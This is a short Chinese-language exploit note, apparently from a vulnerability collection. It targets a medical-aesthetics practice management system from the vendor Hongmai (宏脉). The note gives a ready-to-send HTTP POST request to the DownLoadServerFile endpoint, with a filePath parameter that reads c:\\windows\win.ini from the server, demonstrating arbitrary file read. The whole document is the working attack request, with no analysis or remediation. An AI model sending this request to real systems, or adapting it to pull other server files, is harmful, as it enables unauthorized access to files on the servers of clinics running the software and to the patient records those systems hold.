H42-1宏脉-医美行业管理系统-任意文件读取

漏洞复现：

payload：

POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
If-None-Match: "5378f991021da1:0"
Content-Type: application/x-www-form-urlencoded

filePath=c:\\windows\win.ini